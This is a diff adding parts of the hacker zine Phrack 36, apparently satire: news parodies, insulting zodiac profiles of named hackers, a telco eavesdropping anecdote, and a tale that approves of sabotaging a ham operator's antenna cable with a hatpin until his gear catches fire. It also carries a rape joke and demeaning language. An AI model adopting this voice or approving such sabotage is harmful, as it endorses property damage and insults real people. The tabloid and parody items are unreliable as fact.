+    must be sent from the account where you wish Phrack to be delivered.
+
+2.  Leave the "Subject:" field of that letter empty.
+
+3.  The first line of your mail message should read:
+    SUBSCRIBE PHRACK <your name here>
+
+4.  DO NOT leave your address in the name field!
+    (This field is for PHRACK STAFF use only, so please use a full name)
+
+Once you receive the confirmation message, you will then be added to the Phrack
+Mailing List.  If you do not receive this message within 48 hours, send another
+message.  If you STILL do not receive a message, please contact
+"SERVER@STORMKING.COM".
+
+You will receive future mailings from "PHRACK@STORMKING.COM".
+
+If there are any problems with this procedure, please contact
+"SERVER@STORMKING.COM" with a detailed message.
+
+You should get a conformation message sent back to you on your subscription.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+    Now we are off to the Cybernetic Realm of Cyberwaste.  If you are upset
+about what is said about you in this issue.  DEAL WITH IT!  Maybe you should
+get a sense of humor and then write a file about us.  Until next time it's
+off to cyberspace and as Don Ingraham (luzer) would say, "off to rape campus
+co-eds! (was that a good sound bite or WHAT, Geraldo?!?!?)!."
+
+              You've had Phrack Classic, NOW try new Diet Phrack!
+                  "Just for the Phun of it...Diet Phrack!!"
+
+                                  Your Editors
+
+   Compaq Disk (Crimson Death)         &         Dr. Dude (Dispater)
+
+                            phracksub@stormking.com
+_______________________________________________________________________________
+
+                        Phrack XXXVI Table of Contents
+                        =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+ 1.  Introduction to Diet Phrack (Phrack 36) by Compaq Disk and Dr. Dude
+ 2.  Diet Phrack Loopback by Phrack Staff
+ 3.  In Living Computer starring Knight Lightning
+ 4.  The History ah MOD by Wing Ding
+ 5.  *ELITE* Access by Dead Lord and Lord Digital (Lords Anonymous!)
+ 6.  The Legion of Doom & The Occult by Legion of Doom and Demon Seed Elite
+ 7.  Searching for speciAl acceSs agentS by Dr. Dude
+ 8.  Phreaks in Verse II by Homey the Hacker
+ 9.  Real Cyberpunks by The Men from Mongo
+10.  Elite World News by Dr. Dude
+11.  Elite World News by Dr. Dude
+
+
+Coming soon...
+
+                                 Phrack Jolt!
+
+                       All the VMBs and TWICE the c0deZ!
+_______________________________________________________________________________
diff --git a/phrack36/10.txt b/phrack36/10.txt
new file mode 100644
index 0000000..b537c7c
--- /dev/null
+++ b/phrack36/10.txt
@@ -0,0 +1,360 @@
+                                ==Diet Phrack==
+
+                 Volume Three, Issue Thirty-Six, File 10 of 11
+
+                _______________________________________________
+               |                                               |
+               |                ^*^ ^*^ ^*^ ^*^                |
+               |                                               |
+               |              *Elite* World News               |
+               |                                               |
+               |            Issue 36 / Part 1 of 2             |
+               |                                               |
+               |   Compiled, Edited, and Mangled by Dr. Dude   |
+               |                                               |
+               |                ^*^ ^*^ ^*^ ^*^                |
+               |_______________________________________________|
+
+
+A GOOD HAM IS A DEAD HAM
+Special Thanks:  Twisted Pair
+
+     Just as geeks with computers annoy hackers and phreaks, geeks with "ham"
+sets annoy those of us that diddle with electronics.  To prove my point just go
+to ANY "Ham-Fest."  See the guy walking around with the headset walkie-talkie
+that looks like he shaved about 4 days ago, grossly overweight, dressed in the
+ugliest clothing, and is just simply nerdier than hell?  Being involved with
+electronics we are constantly irritated by these losers.  We urge everyone out
+there to DESTROY ANYONE THAT CLAIMS TO BE A HAM!!!!!
+
+     Anyway, what follows is a true story:
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+     Our story is basically about a guy named Jim.  Jim liked to watch a
+particular TV show when he got home from work everyday like a lot of people do.
+Lately, Jim's TV reception on all channels was being ripped up by an unknown
+interference signal.  Being disgusted with the TV picture, ol' Jim said, "Fuck
+it."  He decided to listen to the radio for awhile, but, GOD DAMNIT there was
+interference there, too.  By this time Jim is really very upset.  The
+interference would come in spurts, loudly interrupting whatever show was on at
+the time with a loud, distorted, unintelligible voice.
+
+     Jim began to wise up quickly after being subjected to watching snowy
+pictures, flipping pictures, and listening to someone's raspy, annoying
+distortion on his TV.  He figured out that his neighbor down the street (we'll
+just call him Ham) had a big antenna sticking up beside his house.  Jim noticed
+that the interference was always present when Ham's 4x4 truck, with KC lights,
+and tractor tires was at home.  Jim went over to talk to Ham.  Ham said his
+"antenner" was his "binnus."   What ever Ham wanted to do with it was his
+"damned binuss."  After the door was slammed in Jim's face, Jim decided to do
+some research.
+
+     Jim spoke to some of his other neighbors about the problem.  What a
+surprise.  Turns out they ALL had the interference.  The interference area was
+at least 4 blocks in every direction.  The neighbors decided that they would
+go have a chat.  So, 6 people from all parts of the neighborhood went go see
+Ham for a friendly visit.  Ham reluctantly opened the door and immediately
+started cussing about it being his "antenner," his "Ham gear," his
+"ampluhfieers," and he would operate them as he damned well pleased!  He also
+DARED anyone to stop him from broadcasting in the neighborhood.
+
+     Jim, now beyond pissed off, contacted the FCC regional office in Chicago.
+They helped him fill out a formal complaint.  The FCC, usually slow to act on
+such complaints, gave Jim a lucky break.  The FCC just happened to have a
+senior inspection official who would be in Jim's area the next week. Jim
+couldn't wait!  On the fateful day of the FCC's visit, they came armed to the
+teeth with all kinds of state-of-the-art-neato things.  The FCC guys showed up
+in a white van with windows tinted black.  There were no markings on this van,
+except for multiple antennas of all types sitting on top of the van (how very
+unobtrusive and sneaky are they).  The inspectors first met with Jim to look at
+his bad reception to confirm that Ham was transmitting.  Then they took Jim out
+to the van to show him how they check out such complaints.  The van was LOADED.
+The FCC guys had spectrum analyzers, custom-made multi-frequency receivers that
+covered all bands, they had signal strength meters, they had equipment
+controlled by a PC.  They also had a PC linked via radio to somewhere.  On it
+they could look up information on ANY ham license, broadcast license, suspected
+pirate station, or check personal records of known offenders.
+
+     The FCC's equipment confirmed that Ham was broadcasting shortwave with WAY
+too much power.  Their power meter was pegged on its highest scale, damaging
+it (oops!).  Well, the FCC inspector was pretty hot about that.  In fact, he
+was really pissed.  He drove the van up to Ham's house, slamming on the brakes
+with screech.  Ham bolted to the door.  The FCC guys showed their ID and asked
+Ham to come on outside and look at the stored readings they had made earlier on
+Ham's signal.  Ham refused at first, but finally came outside.
+
+     Ham swore a few too many times and pissed off the FCC inspectors even
+more.  Ham told them he didn't believe their readings, and would just do as he
+pleased.  He went back into the house and locked the door.  Jim wasn't happy
+either.  After using their cellular phone to call for police backup, the senior
+FCC inspector told his partner to cover the back door.
+
+     The police arrived with lights on and sirens blaring.  The FCC guy
+INSISTED that HE get to kick Ham's door in.  The police obliged.  After a short
+struggle with Ham, he was tossed onto the front yard and cuffed.  The
+inspectors confiscated a whole room full of Ham gear, 3 transmitters, Ham logs,
+big homemade linear amplifiers, etc.  Not wanting to climb Ham's tower to get
+at his antenna, the FCC just CUT OFF Ham's antenna cable about 15 feet up.
+How cute!  The WHOLE cable would have to be replaced if Ham was ever to
+broadcast again.
+
+     Ham's gear was permanently confiscated, his license revoked for life, and
+certainly appeared as though he was embarrassed by the scene in his yard.  The
+end?  Not!
+
+     Just one month later Jim started noticing interference patterns on his TV
+set and radio again.  Daily the problem grew worse.  This time he could hear
+tones mixed in with the crackly, distorted voice.  After a week of this
+was back at it again.  Jim checked it out.  He saw that Ham's truck was,
+indeed, in the driveway every time the distortion was present.  Ham WAS back
+at it again.  Jim assured everyone who called that he WOULD take care of the
+problem once and for all.  After watching the evening news program break apart
+several times (always during the most important parts), Jim got good and mad.
+It was getting dark, so Jim decided to do a little tower climbing!
+
+     Jim wore black clothing so he wouldn't be seen by Ham.  While getting
+ready to scale Ham's tower, Jim noticed that Ham had installed brand-new
+antenna cable.  A light was on in the basement window which was directly in
+front of the base of the tower.  Jim peered into the window.  He noticed that
+each time Ham talked into his microphone, a red light came on that could be
+faintly seen from outside.  Jim jumped onto the base of the tower, being
+careful that Ham couldn't see his feet out his basement window.  On the way up
+the tower, Jim looked down to watch the red light which went on whenever Ham
+was transmitting.
+
+     Jim came prepared for the job.  He had two things in his pocket;  a long,
+sharp hatpin and a roll of black electrical tape.  After climbing about 15 feet
+up the tower, Jim once again looked down to see if Ham's red light was on.  It
+was off.  Jim worked fast.  He took out the hat pin and inserted it crossways
+straight THROUGH Ham's new antenna cable.  The hatpin would short out the
+cable's grounded shield with the live center conductor in the cable.  He made
+sure it was pushed in all the way.  Jim quickly grabbed the electrical tape and
+carefully wrapped it around the cable to cover up the pin, making it
+unnoticeable.  Then he climbed down a little ways and decided to jump the rest
+of the way down.
+
+     Just as he landed on the ground the sparks FLEW!  He saw a BRIGHT red
+flash of light as Ham keyed on his transmitter.  There were a couple of loud
+pops as loud as gunfire.  Lying on the ground, Jim saw the smoke and flames
+rolling out of Ham's transmitter and amplifier.  Ham was JOLTED out of his
+chair with ice cubes flying out of the drink he was holding.  Ham's circuit
+breaker must have tripped, too because his entire HOUSE went dark after
+about 5 seconds.
+
+     Ham never was able to find the problem with his antenna system.  He must
+have given up because the interference stopped!
+_______________________________________________________________________________
+
+DEMON COMPUTER KILLS TWO WORKERS!                            November 12, 1991
+by Sally O'Day (Weekly World News)
+
+      "Exorcist Called In After Experts Discover Virus-bred Evil Spirit!"
+
+     Bank officials have summoned an exorcist to rid a computer terminal of a
+hideous horned demon that <has> already killed two employees and put another in
+a coma!
+
+     And if Father Hector Diaz fails in his mission to banish the spirit,
+authorities say they will have to shut down the bank because the computer can't
+be turned off, moved, or unplugged.  And as long as it remains in place, every
+customer and employee is in danger.
+
+     "This sounds like something out of a sci-fi movie, but the threat is both
+serious and real," Police Detective Raul Lopez told reporters.  "I don't know
+why and I don't know how.  But an evil force or spirit is living in that
+machine and the death of two innocent people proves it."
+
+     Maria Catalan was found sitting at her terminal with her head in her lap."
+Carmen de la Fuente had a fatal heart attack within two minutes of sitting
+down to work.
+
+     Computer experts tired to examine the terminal, but they had no success
+whatsoever.  One of them started babbling like a madman when he got within 10
+feet of the machine and a dozen more were flung to the floor like rag dolls by
+some unseen force.
+
+     "We can't turn the machine off because everyone who tries blacks out and
+falls to the floor.  I know I must sound like a lunatic, but that computer
+truly has a mind -- and a life -- of its own."
+
+     The mind-numbing drama began when the bank in Valapariso, Chile, installed
+a new computer system last spring.  Within days the system turned deadly.
+
+     When a bank custodian told of seeing a hideous horned demon appear on the
+computer screen, bank officials asked Father Diaz to perform an exorcism.
+The priest has been unavailable for comment while he prepares the rite of
+exorcism.
+
+     But a spokesman for the firm that installed the computer system says that
+a computer virus almost certainly created the conditions which caused the
+terminal to kill.
+______________________________________________________________________________
+
+THE TRUE SIGNIFICANCE OF ZODIAC SIGNS
+by Dr. Dude
+
+AQUARIUS (JAN 21-FEB 19)  You have an inventive mind and are great at
+engineering people.  You frequently abuse c0dez and spend a great deal of time
+hacking voice mail box systems.  (Night Ranger)
+
+PISCES (FEB 21-MAR 20) You have a very vivid imagination and often think you
+are being followed by the FBI and the CIA.  You also feel as though you need to
+join as many "groups" as possible.  Pisces write a lot of "How Break Into/Steal
+Fortresses" files.  (Lex Luthor)
+
+ARIES (MAR 21-APR 21) You are a pioneer and an innovator.  You hold most people
+in contempt.  You are quick tempered, impatient, and scornful of everyone.  No
+one can ever hope to be as El1te as you are.  Most Aries aren't actually
+hackers, because they spend too much time pestering other hackers and trying to
+destroy the computer underground than actually hacking into systems.  All aries
+will grow up to work for the Secret Service.  All Aries try to join MOD.
+(Dictator, Dan the Operator, Corrupt)
+
+TAURUS (APR 21-MAY 21) You are practical and persistent.  You hack like hell
+and never get credit for anything.  Most people think you are racist.  You like
+to write files about "Running Over Things With a 4x4" and "Making Drugs."  You
+are goddamn redneck hacker.  (Taran King)
+
+GEMINI (MAY 22-JUNE 21) You are a quick and intelligent thinker.  People like
+you because you are bisexual.  However, you are inclined to expect too much for
+too little.  This is why all Geminis are leeches.  Geminis belong to at least
+10 boards at a time and are on the endless quest for El1teness.
+
+CANCER (JUNE 22-JULY 23) You are very compassionate and overly trusting and
+never do any dark side hacking.  This makes you the perfect fool.  Cancers
+write virii in LOGO and Blue Box from their home phones.  Cancers think that
+Tim Foley is a misunderstood man.
+
+LEO (JULY 24-AUG 23) You consider yourself a born leader, while others consider
+you loud and pushy.  This is why all Leos are power hungry and therefore a lot
+of Leos are sysops.  Most Leos talk big and then do nothing. Leos are also into
+starting "groups."  (Ninja Master)
+
+VIRGO (AUG 24-SEPT 23) You are the logical type and hate disorder.  That's why
+you spend more time collecting text files and news related to hacking than
+actually doing any hacking or phreaking.  (Crimson Death, Knight Lightning)
+
+LIBRA (SEPT 24-OCT 23) You are the artistic type and have a difficult time with
+reality.  You brag about your library of porno GIF's and have close ties with
+Amiga pirate groups.  You also tend to be fairly talkative, thus making you a
+great informant for the Secret Service.  (Dispater, Erik Bloodaxe, Tuc)
+
+SCORPIO (OCT 24-NOV 22) You are shrewd in business and cannot be trusted.  You
+will achieve the pinnacle of success due to your complete lack of morals and
+ethics.  All Scorpios are into crashing BBS.  You are a perfect son of a bitch.
+(The Disk Jockey)
+
+SAGITTARIUS (NOV 23-DEC 21) You are overly optimistic and enthusiastic. You
+have a reckless tendency to rely on luck since you lack any real talent.  A
+typical Sagittarian move is to drag home 10 bags of trash from the local telco
+to discover the only thing they got out of the ordeal was a car that smells
+like coffee for the next 3 weeks.  (Aristotle, Predat0r)
+
+CAPRICORN (DEC 22-JAN 20) You are overly conservative and afraid of taking
+risks.  You would be afraid of redboxing from a downtown Los Angeles at
+lunchtime.  You think that copying pirated software will lead the FBI to you
+front doorstep the next day.  You are a puss.  (Juan Valdez)
+______________________________________________________________________________
+
+GOD, RUSTY, & INWARD OPERATORS
+
+     Once again, Pat Townson admonishes a reader of comp.dcom.telecom for
+having a little phun at work.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+From: 0004133373@mcimail.com Donald E. Kimberlin (comp.domp.telecom)
+
+..in a footnote <Digest vol10, iss637), our Moderator suggests,
+
+> "... some children, phreaks and assorted other folks consider it quite a
+> funny joke to conference two unrelated parties via three-way calling, then
+>let them (the two called parties) squabble with each other while the
+>perpetrator goes spastic with laughter at his little prank.   PAT]"
+
+Well, it brings to mind three incidents that I guess can now be told:
+
+1.) The good old "testboard," of course, had the ability to "conference in"
+several parties, while the person on the testboard could cut off their own talk
+path, leaving the two parties talking to each other. In an earlier, simpler DDD
+network, simply dialing an area code plus 121 got the "Inward Operator." a.k.a
+"Assistance" to the public's view for an entire area code. In a yet-to-be-
+divulged corner of Long Lines, it was a favorite pastime to dial 809+121 (San
+Juan, Puerto Rico) and 808+121 (Honolulu, Hawaii) and let two Ernestines of
+the Lily Tomlin era argue about which had called which and what they were
+supposed to do.  Meantime, gales of laughter could be heard around the
+monitoring loudspeaker in a testroom thousands of miles from either of them!
+
+2.) In a similar fashion, happenstance listening found an FX between two cities
+that got dialed up every morning and contained a day-long dialog between two
+receptionists of the same company. One was named "Rusty."  Rusty's nightly
+romantic exploits in a major seaside resort city, if true, would provide years
+of material for one of today's "Confessions" 900 numbers!  They were replete
+with details of Rusty's specialized wardrobe and tools of her nighttime trade.
+Needless to say, the day shift had a monitor speaker plugged into THAT FX
+daily. (I almost swallowed my chewing gum more than once!)  After a long
+period <months> of unobtrusive listening, a testboardman <whose name is yet to
+be divulged> began to pop in with comments that could be heard only by Rusty
+and not her audience at the other end.
+
+Rusty would respond, leaving her private audience puzzled at who Rusty was
+talking to.  That would cause the discussion to turn to suggestions of
+reporting eavesdroppers on the phone.  However, no reports were ever filed when
+it got around to, "But what if they ask what we were talking about?" (It would
+have been hilarious, anyway, because the self-same room that was doing the
+listening was the place the trouble reporting number was in ... in fact, the
+self-same people!)
+
+3.) The highest level of development of this art might be classified as an
+early form of the "Talking to God" service recently purported to have emerged
+in Italy.  This one was over on the 17B Board, where thousands of DDD message
+trunks terminated in ports of the 4A toll switching machine.  Each evening, as
+the network peaked with the 7 PM rush for cheap rates, it wasn't difficult to
+find a circuit on which a couple of good old Bible-toting down south mommas
+were commiserating about their physical aches and heartaches over the foibles
+of their "chilluns."  When one finally asked, as they always did, for the Lord
+to intervene, an obliging testboardman would plug into the four-wire transmit
+toward the requester and play God on the Telephone.  Invariably, the poor dear
+would literally swoon and shush the questioning other, who couldn't hear God
+talking!  One can imagine the testimony of miracles next Sunday morning at the
+country church!
+
+But of course, NOBODY ever listens in on YOUR calls...why, the Company would
+NEVER permit that!  Boy, I sure hope the Statute of Limitations has run out on
+this!
+
+[Moderator's Note: I still don't think it is funny. I regard it as a major
+violation of trust; and I'm sure you are aware that had the employees involved
+in this little prank been caught and the subscriber's involved elected to sue,
+telco would have had to pay financially and the employees involved probably
+would have lost their jobs.  PAT]
+_______________________________________________________________________________
+
+ELITE WORLD NEWS QUICKNOTES
+
+1.  After the recent massive failure in New England, their fourth since January
+    1990, ATT announced a new customer service number for affected customers to
+    call in case of future problems: 1-900-Call-ATT.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+2.  Corrupt & MOD are Really Fat Albert & The Junk Yard Gang!
+    "Habba mamba, NebbitWibbiz bebba Fabbit Abet."
+
+    That's right! In this exclusive interview with Weird Harald (aka The Wing)
+    Phrack Inc. discovers that the true identity of Corrupt is Fat Albert.
+    WH is now talking.  Why?  Because the leader of the infamous New York City
+    crack gang (Corrupt) threatened to post his "info" on Internet Relay Chat
+    if Harald did not step up his rag wars.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+3.  The Hacker's Dictionary explains that "RTM," apart from being the login of
+    a certain Cornell student, is also common shorthand for "Read The Manual,"
+    as in "Don't hassle me now, did you RTM?"
+
+    Turns out that the original expression was RTFM, like "Look, I got 20
+    klingons on the screen and no warp drive.  Go RTFM."
+
+    Now, turns out that Morris's hack is viewed as uncool because he screwed
+    up the coding so a few netfolks changed his login to RTFM.
+
+    "Ha ha only serious."  (another expression from the Hackers's Dictionary)
+_______________________________________________________________________________
diff --git a/phrack36/11.txt b/phrack36/11.txt
new file mode 100644
index 0000000..89d0343
--- /dev/null
+++ b/phrack36/11.txt
@@ -0,0 +1,476 @@
+                                ==Diet Phrack==
+
+                 Volume Three, Issue Thirty-Six, File 11 of 11
+
+                _______________________________________________
+               |                                               |
+               |                ^*^ ^*^ ^*^ ^*^                |
+               |                                               |
+               |              *Elite* World News               |
+               |                                               |
+               |            Issue 36 / Part 2 of 2             |
+               |                                               |
+               |   Compiled, Edited, and Mangled by Dr. Dude   |
+               |                                               |
+               |                ^*^ ^*^ ^*^ ^*^                |
+               |_______________________________________________|
+
+
+STUDS PROMOTE BETTER IMAGE
+
+Introducing Eric Bloodtest, Dick Holiday, PH-factor, and Bobbie Buttercupps!
+
+     HOUSTON -- Three self-professed members of the Legion of Dudes, one of the
+most notorious swingers groups to operate in the United States, said they now
+want to get paid for their skills.  Along with a former X-rated film actor, the
+members launched a new dating service called ComseX Dating Security that will
+check out women whom male customers might be interested in dating.
+
+     "We have been in the dating business for the last 11 years -- just holding
+on to the different end of our stick," said Scott Girlchaser who said he once
+used the handle Dick Holiday as a Legion of Dudes member.  The group has been
+celibate since late last year, Girlchaser said.
+
+     The start-up firm plans to offer sister penetration testing, personality
+matching, and sexual training services as well as security products.  "We have
+information that you can't find in Penthouse or Playboy:  We know why people
+date, what motivates them, why they are curious," Girlchaser said.
+
+     Already, the start-up has met with considerable skepticism.
+
+     "Would I hire a gigolo to be an escort for my mother?" asked John
+Kastrate, dating information administrator at Love & Holding Corporation in
+Hollywood, California.  "If they stayed celibate for 5 to 10 years, I might
+reconsider, but 12 to 18 months ago, they were swingers, and now they have to
+prove themselves."
+
+     "You don't hire ne'er-do-wells to come and grope at your fiance," said Tom
+Smallpenis, a sexual therapist patient at General Hospital.  "The Legion of
+Dudes is a known anti-monogamous group, and although it is good to see they
+have a heterosexual bent, GH would not hire these people."
+
+     ComseX already has three contracts with various men's organizations,
+Girlchaser said.
+
+     "I like their approach, and I am assuming they are legit," said Herman
+Slutten, a dating consultant at HeyMan Datababe Corporation in Phoenix,
+Arizona.  His firm is close to signing a contract with ComseX, Slutten said.
+
+     Federal health enforcers have described the Legion of Dudes in reports,
+indictments, search warrants, and other documents as a closely knit group of
+about 15 swingers whose members sleep around, father children, skip out on
+child support, participate in S&M, and break hearts by entrancing women across
+the country.
+
+     The group was founded in 1984 and has had dozens of members pass through
+its ranks.  Approximately 12 former members have been infected by sexually
+transmitted diseases relating to their exploits.  Three former members are now
+dead and at least three others are regularly receiving treatment.  None of the
+ComseX founders have ever been infected with a sexually transmitted disease.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+AN OFFER YOU COULD REFUSE?
+
+     Tom Smallpenis, a sexual therapist patient at General Hospital in Chicago,
+says he would never hire ComseX Dating Security, a dating service launched by
+three ex-members of the Legion of Dudes.  "You don't bring in an unknown
+commodity and give them the keys to the bedroom," Smallpenis said.  Chris
+Womanizer, one of ComseX's founders, retorted:  "We don't have the keys to
+their bedroom, but I know at least four people off the top of my head that do."
+ComseX said it will do a free sister penetration for GH just to prove the
+dating service's sincerity, Womanizer said.  "All they have to do is sign
+release forms saying they won't hit us with a palimony suit."
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+GROUP DUPES SEXUAL EXPERTS
+
+     "Houston-Based ComseX Fools Consultants To Gather Sexual Information"
+
+     HOUSTON -- Dating and escort services are supposed to know better, but at
+least six firms acknowledged last week that they were conned.  The
+"entertainment" providers said they were the victims of a bit of sexual
+engineering by ComseX Dating Security, Inc., a dating service recently
+launched.
+
+     ComseX masqueraded as prospective bachelors and out of town businessmen
+using the name of Omega Sigma Delta, a large nation-wide young men's
+fraternal organization to gather information on how to prepare panty-raid
+proposals and conduct sorority audits and other fraternity business techniques,
+the consultants said.
+
+     Three of ComseX's four founders are self-professed former members of the
+Legion of Dudes, one of America's most notorious swingers groups, according to
+health inspectors.
+
+     "In their press release, they say, 'Our firm has taken a unique approach
+to its sales strategy,'" said one consultant who requested anonymity, citing
+professional embarrassment.  "Well, sexual engineering is certainly a unique
+sales strategy."
+
+     Sexual engineering is a technique commonly used by swingers to gather
+favors from helpful, but unsuspecting women that may be used to penetrate other
+unsuspecting females.
+
+     "They are young kids that don't know their penis from their belly-button
+about doing business, and they are trying to glean that from everybody else,"
+said Itchy Crotch, director of consulting at Sister Virginity Consultants,
+Inc., in Little Rock, Arkansas.
+
+     The consultants said gathering information by posing as a prospective
+customer is a common ploy, but that ComseX violated accepted business ethics by
+posing as the Omega's.
+
+     "It is a pretty significant breech of business ethics to make the
+misrepresentation that they did," said Hardon Mormon, house father for the
+Omega Sigma Delta's.  "They may not be swinging anymore, but they haven't
+changed the way they operate."
+
+     Mormon said his chapter had received seven or eight calls from sexual
+consultants who were following up on information they had sent to "Hairy
+Prostate," supposedly the Rush Chairman.
+
+SAME OLD STORY
+
+     The consultants all told Mormon the same tale:  They had been contacted by
+"Prostate," who said he was preparing to conduct a sexual orientation clinic
+and needed information to pitch the idea to the chapter President and alumni.
+"Prostate" had asked the consultants to prepare a detailed proposal outlining
+the steps of a sexual invitation, pickup lines, and other information.
+
+     The consultants had then been instructed to send the information by
+overnight mail to a Houston address that later proved to be the home of two of
+ComseX's founders.  In some instances, the caller had left a telephone number
+that when called was found to be a constantly busy condom company order number.
+
+     Mormon said "Prostate" had an intimate knowledge of the fraternity's
+rituals that is known only to members.  While there is no evidence that the
+chapter was penetrated by outsiders, the Omegas are "battering down their
+hatches," Mormon said.
+
+     Posing as a prospective customer is not an uncommon way to gather
+competitive information, said Chris Womanizer, one of ComseX's founders, who
+once used the handle of Erik Bloodtest.
+
+     "Had we not been who we are, it would be a matter of no consequence,"
+Womanizer said.
+
+     "They confirm definitely that they called some of their competitors," said
+Michael Shyster, an attorney representing ComseX.  "The fact they used Omega
+Sigma Delta was an error on their part, but it was the first name that popped
+into their heads.  They did not infiltrate the fraternity in any way."
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+"LEGION OF DUDES -- INTERCOURSE WORLD TOUR" T-SHIRTS!
+
+     Now you too can own an official Legion of Dudes T-shirt.  This is the same
+shirt that sold-out rapidly at the "UltraSex" swingers conference in San
+Francisco.  Join the other proud owners such as award-winning actresses Traci
+Lords and Madonna by adding this collector's item to your wardrobe.  This
+professionally made, 100 percent cotton shirt is printed on both front and
+back.  The front displays "Legion of Dudes Intercourse World Tour" as well as a
+condom on a telephone next to a little black book.  The back displays the words
+"Swinging for Jesus" as well as a substantial list of "tour stops" (women's
+telephone numbers) and a quote from Dr. Ruth.  This T-shirt is sold only as a
+novelty item, and is in no way attempting to glorify meaningless sex.
+
+     Shirts are only $15.00, postage included!  Overseas add an additional
+$5.00. Send check or money-order (No CODs, cash or credit cards -- even if it's
+really your card :-) made payable to Eric Bloodtest.
+_______________________________________________________________________________
+
+GOLFERS: THREAT TO NATIONAL SECURITY
+
+     It must no longer go unremarked that many of the criminals who threaten
+the foundation of our society are golfers.  Golfers persist in attacking our
+personal, financial, and military security. Many golfers like the famous Spiro
+Agnew, have been involved in bribery, extortion, and other forms of corruption.
+
+     Some golfers have been know to hit out of bounds as a pretext for
+trespassing in residential communities.  Such thing can easily turn into
+incidents of spying and burglary.
+
+     Other golfers will use the harmless-looking little white balls to inflict
+injuries on bystanders, propelling the dangerous projectiles at speed in excess
+of 120 miles per hour.  The danger of head injury is obvious.  Golfer's
+careless disregard for the safety of other people hardens our children to
+violence.  The idea that shouting a single, obscure word makes it all right to
+bop some innocent person on the head with a hard projectile has brought our
+society to the brink of savagery.
+
+     It doesn't take a genius to see that avoidance of golf is a corner stone
+of Soviet military strategy.  This gives the Soviets a tremendous advantage in
+daytime warfare.  If the Soviets launch an attack at 3 pm EST on a weekday in
+June, approximately 20% of American manpower will be uselessly deployed in
+fairways, sandtraps, and rough.  Even those in bunkers will be in the wrong
+kind of bunkers.  At 3 pm on a weekend, as much as 50 percent of our manpower
+might be trying to avoid bogies rather than trying to shoot them down.
+
+     If the forgoing attack on golfers seems unfair (and of course, the analogy
+is not perfect), it is not any more so than the attack by the general press on
+hackers of another kind -- computer hackers.  Some national publications have
+used the term "hacker" incorrectly as a synonym for "criminal."  Hackers are
+people who play with computers at a high technical level because they enjoy
+doing so.  There are many, thousands, of hackers in North America.  A few
+hackers use their computer skills for pranks, and fewer still use their skills
+to commit crimes.  But chances are excellent that far more hackers are helping
+to build defenses around database rather than trying to penetrate them.  Even
+if one percent of hackers started trying to invade databases the problem would
+be more serious than those sensationalized in the press.
+
+     It wasn't being a golfer that got Spiro Agnew in trouble.  Just being a
+hacker won't get you in trouble, either.  Hackers are entitled to the same
+presumption of innocence as golfers and other common special interest groups.
+Hackers also deserve the correct continued use of the authentic, distinctive,
+and colorful name that they gave themselves.
+_______________________________________________________________________________
+
+PRIME SECURITY MEASURES FROM BELLCORE                         December 10, 1991
+
+The December 10, 1991 issue of MacWeek contains an article which states that
+two mathematicians have found a trapdoor in the National Institute of Standards
+and Technology's proposed Digital Signature Standard.
+
+Stuart Haber and Arjen Lenstra, both of Bellcore, have discovered a way of
+choosing prime numbers for DSS which could be used to subvert the security of
+the algorithm, allowing digital signatures to be forged.
+
+Miles Smid, manager of NIST's Security Technology Group, agreed that trapdoor
+prime numbers could be constructed.  He had been aware of this possibility but
+apparently hoped to circumvent this problem by relying upon primes generated by
+a trusted federal agency.
+
+The article implies that there are ways of checking a prime to see if it is one
+of the weak "trapdoor" primes.  However, Smid agrees that average users could
+not be expected to perform this test.
+
+Bellcore has developed an implementation of NIST-DSS that it had planned to
+distribute for free.  With this recent revelation, though, Bellcore has decided
+to not distribute the software.
+_______________________________________________________________________________
+
+VIRUS UPDATE
+
+                       Official Notice, Post Immediately
+
+                                    X     x
+                                     X   x
+                                      X x
+                                       X
+                                      x X
+                                     x   X
+                                    x     X
+
+                               Dangerous Virus!
+
+Several years ago a virus called the "X window system" escaped from Project
+Athena at MIT where it was being held in isolation.  It took some time for the
+full magnitude of this disaster to become known.  When confronted with the
+truth, a spokesman for MIT would state only that "MIT assumes no
+responsibility."  In the meantime, X had succeeded in infiltrating Digital
+Equipment Corporation, where it corrupted the judgement of key technical and
+management personnel in this organization.
+
+With a foothold gained at DEC, a sinister consortium was created using X as
+part of a plan to dominate and control interactive window systems.  Today, X
+windows is distributed by this consortium free of charge to unsuspecting
+victims.  DEC daily ships machines carrying this dreaded infestation.
+
+X - whether it's filling your hard disk or consuming your CPU, you can be sure
+it's up to no good.  Innocent users need to be protected from this dangerous
+virus.  Even as you read this, the X source distribution and the executable
+environment is present and being faithfully maintained on hundreds of
+computers, perhaps even your own.
+
+The destructive cost of X cannot even be guessed.
+
+X is an example of how software with good intentions can go bad.  It victimizes
+innocent users by distorting their perception of what is and what is not good
+software.  This malignant window system must be destroyed.  Ultimately DEC and
+MIT must be held accountable for this heinous *software crime*, brought to
+justice, and made to pay for a *software cleanup*.  Until DEC and MIT answer to
+these charges, they both should be assumed to be protecting dangerous software
+criminals.
+
+Don't be fooled! Just say no to X.
+
+X windows.  A mistake carried out to perfection.  X windows.  Dissatisfaction
+guaranteed.  X windows.  Don't get frustrated without it.  X windows.  Even
+your dog won't like it.  X windows.  Flaky and built to stay that way.  X
+windows.  Complex nonsolutions to simple nonproblems.  X windows.  Flawed
+beyond belief.  X windows.  Form follows malfunction.  X windows.  Garbage at
+your fingertips.  X windows.  ignorance is our most important resource.  X
+windows.  It could be worse, but it'll take time.  X windows.  It could happen
+to you.  X windows.  Japan's secret weapon.  X windows.  Let it get in *your*
+way.  X windows.  Live the nightmare.  X windows.  More than enough rope.  X
+windows.  Never had it, never will.  X windows.  No hardware is safe.  X
+windows.  Power tools for power fools.  X windows.  Power tools for power
+losers.  X windows.  Putting new limits on productivity.  X windows.
+Simplicity made complex.  X windows. The cutting edge of obsolescence.  X
+windows.  The art of incompetence.  X windows.  The defacto substandard.  X
